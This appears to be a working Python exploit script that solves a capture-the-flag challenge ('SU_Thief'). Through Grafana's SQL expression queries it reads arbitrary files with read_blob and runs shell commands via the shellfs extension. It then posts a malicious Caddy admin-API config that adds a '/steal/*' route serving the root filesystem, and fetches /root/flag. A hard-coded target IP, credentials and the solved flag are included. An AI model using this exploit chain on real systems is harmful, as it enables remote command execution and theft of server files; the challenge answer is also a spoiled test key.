                        "type": "__expr__",
                        "uid": "__expr__",
                        "name": "Expression",
                    },
                    "type": "sql",
                    "hide": False,
                    "expression": expression,
                    "window": "",
                }
            ],
            "from": "1729313027261",
            "to": "1729334627261",
        }

        resp = self.session.post(
            url,
            auth=self.auth,
            json=payload,
            timeout=self.timeout,
        )
        if resp.status_code != 200:
            raise ExploitError(
                f"/api/ds/query HTTP {resp.status_code}: {resp.text[:300]}")

        try:
            return resp.json()
        except ValueError as exc:
            # JSON decoding failures are ValueError subclasses; anything else
            # is a genuine bug and should surface unchanged.
            raise ExploitError(
                f"/api/ds/query returned non-JSON: {resp.text[:300]}") from exc

    @staticmethod
    def _extract_content(data: Dict[str, Any]) -> str:
        """Return the first cell of the first frame of result ``B`` as text.

        String cells are additionally run through a ``unicode_escape`` round
        trip so that literal escape sequences such as ``\\n`` become real
        characters; if that decoding fails the raw string is returned.

        Args:
            data: Decoded ``/api/ds/query`` response.

        Returns:
            The cell content as a string.

        Raises:
            ExploitError: When the expected structure is missing; the message
                carries the server-reported error if one is present.
        """
        try:
            content = data["results"]["B"]["frames"][0]["data"]["values"][0][0]
        except (KeyError, IndexError, TypeError) as exc:
            # Walk results -> B -> error defensively so that an oddly shaped
            # response still produces an ExploitError, not an AttributeError.
            node: Any = data
            for key in ("results", "B", "error"):
                node = node.get(key) if isinstance(node, dict) else None
            if node:
                raise ExploitError(f"query failed: {node}") from exc
            raise ExploitError(
                f"unexpected ds/query response: {json.dumps(data)[:600]}") from exc

        if not isinstance(content, str):
            return str(content)
        try:
            return (
                content.encode("utf-8")
                .decode("unicode_escape")
                .encode("latin1", errors="ignore")
                .decode("utf-8", errors="ignore")
            )
        except UnicodeError:
            return content

    def read_file(self, path: str) -> str:
        """Read a file on the target with ``read_blob`` and return its content.

        Args:
            path: Absolute path on the target; single quotes are doubled for SQL.
        """
        safe_path = path.replace("'", "''")
        expr = f"SELECT content FROM read_blob('{safe_path}')"
        return self._extract_content(self._ds_query(expr))

    def run_shell(self, command: str) -> str:
        """Run a shell command on the target and return its combined output.

        The command is executed through the ``shellfs`` extension with stdout
        and stderr redirected to a scratch file, which is then read back.

        Args:
            command: Shell command line.

        Returns:
            Content of the scratch file after the query was sent.
        """
        # SQL string uses single quotes, so escape any single quote in shell command.
        cmd = command.replace("'", "''")
        expr = (
            "SELECT 1;"
            "install shellfs from community;"
            "LOAD shellfs;"
            f"SELECT * FROM read_csv('{cmd} >{self._CMD_OUTPUT_PATH} 2>&1 |')"
        )

        # The query result itself is not used; only the scratch file matters.
        self._ds_query(expr)
        return self.read_file(self._CMD_OUTPUT_PATH)

    def get_health(self) -> Dict[str, Any]:
        """Return the decoded ``/api/health`` response.

        Raises:
            ExploitError: On a non-200 status.
        """
        url = f"{self.base_url}/api/health"
        resp = self.session.get(url, timeout=self.timeout)
        if resp.status_code != 200:
            raise ExploitError(f"/api/health HTTP {resp.status_code}")
        return resp.json()

    def load_caddy_steal_route(self) -> str:
        """POST a Caddy config that serves ``/`` under ``/steal/*``.

        The config keeps a catch-all reverse proxy to ``127.0.0.1:3000`` and
        adds a route that strips the ``/steal`` prefix and serves files from
        root ``/``. It is written to ``/tmp/caddy_steal.json`` on the target
        and posted to ``http://127.0.0.1:2019/load`` with curl.

        Returns:
            Output of the shell command (curl's response body, if any).
        """
        steal_route = {
            "match": [{"path": ["/steal/*"]}],
            "handle": [
                {
                    "handler": "subroute",
                    "routes": [
                        {
                            "handle": [
                                {
                                    "handler": "rewrite",
                                    "strip_path_prefix": "/steal",
                                }
                            ]
                        },
                        {
                            "handle": [
                                {"handler": "vars", "root": "/"},
                                {
                                    "handler": "file_server",
                                    "hide": ["/tmp/Caddyfile"],
                                },
                            ]
                        },
                    ],
                }
            ],
        }
        proxy_route = {
            "handle": [
                {
                    "handler": "reverse_proxy",
                    "upstreams": [{"dial": "127.0.0.1:3000"}],
                }
            ]
        }
        cfg_obj = {
            "admin": {"listen": "127.0.0.1:2019"},
            "apps": {
                "http": {
                    "servers": {
                        "srv0": {
                            "listen": [":80"],
                            "routes": [steal_route, proxy_route],
                        }
                    }
                }
            },
        }

        cfg_json = json.dumps(cfg_obj, separators=(",", ":"))
        # Base64 keeps the JSON free of quotes that would need shell/SQL escaping.
        cfg_b64 = base64.b64encode(cfg_json.encode()).decode()

        cmd = (
            f"echo {cfg_b64} | base64 -d >/tmp/caddy_steal.json; "
            'curl -s -X POST -H "Content-Type: application/json" '
            "--data-binary @/tmp/caddy_steal.json http://127.0.0.1:2019/load"
        )
        return self.run_shell(cmd)

    def verify_steal_route(self) -> bool:
        """Return True when the live Caddy config contains the ``/steal/*`` matcher."""
        out = self.run_shell("curl -s http://127.0.0.1:2019/config/")
        return "/steal/*" in out

    def fetch_flag_via_steal(self) -> str:
        """GET ``/steal/root/flag`` from the target and return the stripped body.

        Raises:
            ExploitError: On a non-200 status.
        """
        url = f"{self.base_url}/steal/root/flag"
        resp = self.session.get(url, timeout=self.timeout)
        if resp.status_code != 200:
            raise ExploitError(
                f"GET /steal/root/flag HTTP {resp.status_code}: {resp.text[:300]}")
        return resp.text.strip()


def main() -> int:
    """Run the full exploit chain from the command line.

    Steps: check ``/api/health``, confirm command execution with ``id``, load
    the Caddy ``/steal`` route (up to three attempts, verifying after each),
    then fetch ``/root/flag`` through that route.

    Returns:
        0 on success, 1 when an ``ExploitError`` or a ``requests`` network
        error occurs.
    """
    parser = argparse.ArgumentParser(description="SU_Thief one-click exploit")
    parser.add_argument(
        "--url", default="http://156.239.26.40:13333", help="Target base URL")
    parser.add_argument("--user", default="admin", help="Grafana username")
    parser.add_argument("--password", default="1q2w3e",
                        help="Grafana password")
    parser.add_argument("--timeout", type=int, default=15, help="HTTP timeout")
    args = parser.parse_args()

    exp = SUThiefExploit(args.url, args.user, args.password, args.timeout)

    try:
        print("[+] Checking target health...")
        health = exp.get_health()
        print(f"[+] Grafana version: {health.get('version')}")

        print("[+] Verifying RCE context with id...")
        print(exp.run_shell("id").strip())

        print("[+] Loading malicious Caddy route via local admin API...")
        for attempt in range(1, 4):
            load_out = exp.load_caddy_steal_route().strip()
            if load_out:
                print(f"[i] /load attempt {attempt} output: {load_out}")
            else:
                print(f"[+] /load attempt {attempt} output empty (usually success).")

            if exp.verify_steal_route():
                print("[+] Verified /steal route is active in Caddy config.")
                break
            print("[!] /steal route not active yet, retrying...")
        else:
            # Reached only when no attempt hit the break above.
            raise ExploitError("failed to activate /steal route after retries")

        print("[+] Fetching /root/flag through /steal route...")
        flag = exp.fetch_flag_via_steal()

        # Reject the proxied Grafana page before reporting anything as the flag.
        if "<title>Grafana</title>" in flag:
            raise ExploitError(
                "received Grafana HTML instead of flag; /steal route may not be taking effect")

        print(f"\n[FLAG] {flag}")

        m = re.search(r"SUCTF\{[^\n\r}]+\}", flag)
        if m:
            print(f"[+] Parsed flag: {m.group(0)}")
        return 0

    except ExploitError as exc:
        print(f"[-] Exploit failed: {exc}")
        return 1
    except requests.RequestException as exc:
        print(f"[-] Network error: {exc}")
        return 1

# Script entry point: exit with main()'s return value as the process status.
if __name__ == "__main__":
    raise SystemExit(main())
# SUCTF{c4ddy_4dm1n_4p1_2019_pr1v35c}